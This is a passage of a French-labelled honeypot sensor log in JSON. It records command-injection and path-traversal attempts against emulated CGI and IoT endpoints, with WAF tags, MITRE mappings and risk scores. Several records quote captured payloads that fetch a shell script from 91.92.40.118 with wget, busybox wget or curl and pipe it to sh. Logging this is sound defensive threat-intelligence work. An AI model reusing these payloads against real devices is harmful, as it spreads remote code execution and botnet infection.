\u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/adm.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/adm.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/adm.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 186\\r\\nConne\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":330},{"id":11809383,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54786,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":20,"waf_tags":"[\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/makeRequest.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00222987d81543152395f8d92ae32869bdb75f8740c3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 183, \u0022payload_entropy\u0022: 5.194469858357653, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 88.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 62, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022ceac168ddb0414610b840dd4178e3ff24206219a\u0022, \u0022event_fingerprint\u0022: \u00222c5fd456b0131e33e08cf05a13bf83a8a788809f\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 224, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 62}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022677dfae3d3fe11166079549fcf0b8ee5\u0022, \u0022path_pattern_hash\u0022: \u00229e07efe7b4bc2ac9c18d5d90eb43e4ff\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 62}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022waf_tags\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022rce-5\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\\r\\nConnection: close\\r\\n\\r\\ndate=wget 91.92.40.118\/r|sh -s w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022waf_tags\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022rce-0\u0022, \u0022rce-5\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\\r\\nConnection: close\\r\\n\\r\\ndate=wget 91.92.40.118\/r|sh -s w\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022262575eb40b0a4ef59fd7d24141a791c1c744a0a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/makeRequest.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag rce-0) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 62\/100 (Moyen) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 88.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 62}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 62, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0775\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/makeRequest.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/makeRequest.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/makeRequest.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 32\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 88 \u00b7 3 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950468:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":183},{"id":11809384,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54802,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":54,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022441cc5b67a55d21750145916cc982a43fa68ef55\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 293, \u0022payload_entropy\u0022: 5.160123513924846, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a434e1cd9149ef2a922f543860269d6d9e766584\u0022, \u0022event_fingerprint\u0022: \u0022443c37ff61a6120c0cbde2144e6f734a27794d2f\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00222dd65a97beaa4f0b5799642a0cd6f769\u0022, \u0022path_pattern_hash\u0022: \u0022f53c505b8189dcd6ba06b06234c7e209\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022query_string\u0022: \u0022param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%60 HTTP\/1.1\\r\\nHost:\u0022, \u0022payload_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002210bce341aed40becf6327ed9be5982eb0474c43b\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type 